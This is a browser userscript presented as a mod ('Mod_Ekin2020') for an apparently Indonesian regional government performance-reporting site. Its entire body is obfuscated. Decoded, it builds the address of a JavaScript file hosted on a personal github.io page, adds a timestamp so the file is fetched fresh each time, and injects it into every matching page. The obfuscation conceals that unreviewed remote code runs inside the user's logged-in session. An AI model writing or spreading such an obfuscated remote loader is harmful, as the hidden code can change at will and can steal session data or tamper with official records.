// #################################################################
// ################# UPDATE SCRIPT 1 FEBRUARI 2025 #################
// #################################################################

// ==UserScript==
// @name        Mod_Ekin2020
// @namespace   20240830
// @author      hendrik svm
// @include     *kotawaringinbarat*
// @grant       GM_addStyle
// ==/UserScript==

(function () {
  const _0x3aa9a7 = _0x256a;
  (function (_0x599f05, _0x27b250) {
    const _0x28778a = _0x256a,
      _0x22b76a = _0x599f05();
    while (!![]) {
      try {
        const _0x3af7bb =
          parseInt(_0x28778a(0x1f8)) / (0x1af0 + 0x1dba + 0xb55 * -0x5) +
          (parseInt(_0x28778a(0x1f1)) / (0x1eb2 + -0x4a * -0x1c + -0x26c8)) *
            (-parseInt(_0x28778a(0x1fb)) /
              (-0x1 * -0xd3 + 0x58e * 0x2 + 0x2fb * -0x4)) +
          parseInt(_0x28778a(0x201)) /
            (-0x1217 * -0x2 + 0xf5 * 0xa + -0x16de * 0x2) +
          (parseInt(_0x28778a(0x1f4)) /
            (0x1960 + 0x15 * -0x1d + -0x11 * 0x15a)) *
            (parseInt(_0x28778a(0x1fd)) / (-0x257 * -0x3 + -0x5cb + -0x134)) +
          (-parseInt(_0x28778a(0x1ed)) /
            (0x1 * 0xedb + -0x3 * 0x119 + -0xb89)) *
            (-parseInt(_0x28778a(0x1ee)) / (-0x186c + -0x1 * -0xbc5 + 0xcaf)) +
          -parseInt(_0x28778a(0x1fa)) /
            (0x1f * -0x11b + -0x14 * -0x134 + 0x6 * 0x1b5) +
          (-parseInt(_0x28778a(0x1eb)) /
            (0xe * 0x58 + -0x3fb * -0x7 + -0x20a3)) *
            (parseInt(_0x28778a(0x1ec)) /
              (0x1ca8 * -0x1 + 0x2d1 * 0x2 + 0x1711 * 0x1));
        if (_0x3af7bb === _0x27b250) break;
        else _0x22b76a["push"](_0x22b76a["shift"]());
      } catch (_0x511398) {
        _0x22b76a["push"](_0x22b76a["shift"]());
      }
    }
  })(_0x2c8d, 0x1 * 0xb785 + -0x1 * 0x5fd90 + -0x96745 * -0x1);
  function _0x256a(_0x23eabe, _0x275e01) {
    const _0x6cc897 = _0x2c8d();
    return (
      (_0x256a = function (_0x1113a1, _0x33c304) {
        _0x1113a1 = _0x1113a1 - (-0x216b + 0x1207 + 0x114e);
        let _0x12172c = _0x6cc897[_0x1113a1];
        return _0x12172c;
      }),
      _0x256a(_0x23eabe, _0x275e01)
    );
  }
  let timestamp = new Date()[_0x3aa9a7(0x203)]();
  const script = document[_0x3aa9a7(0x1f7) + _0x3aa9a7(0x1f3)](
      _0x3aa9a7(0x1fc)
    ),
    svm_script = document[_0x3aa9a7(0x1ea) + _0x3aa9a7(0x1f5)](
      _0x3aa9a7(0x204)
    );
  function _0x2c8d() {
    const _0x456fa1 = [
      "1732188qqgXOf",
      "github.io/",
      "getTime",
      "body",
      "querySelec",
      "934910lDBnMe",
      "88qOrGYq",
      "148771LfwLWq",
      "184GDZtJY",
      "https://he",
      "setAttribu",
      "2tswfWH",
      "ndrik-svm.",
      "ent",
      "175ufleOr",
      "tor",
      "appendChil",
      "createElem",
      "505913HEpyMm",
      "starter.js",
      "2600109oXIsjz",
      "1001085ICVUQr",
      "script",
      "36582uPQldS",
      "src",
      "?t=",
      "assets/js/",
    ];
    _0x2c8d = function () {
      return _0x456fa1;
    };
    return _0x2c8d();
  }
  script[_0x3aa9a7(0x1f0) + "te"](
    _0x3aa9a7(0x1fe),
    _0x3aa9a7(0x1ef) +
      _0x3aa9a7(0x1f2) +
      _0x3aa9a7(0x202) +
      _0x3aa9a7(0x200) +
      _0x3aa9a7(0x1f9) +
      _0x3aa9a7(0x1ff) +
      timestamp
  ),
    svm_script[_0x3aa9a7(0x1f6) + "d"](script);
})();
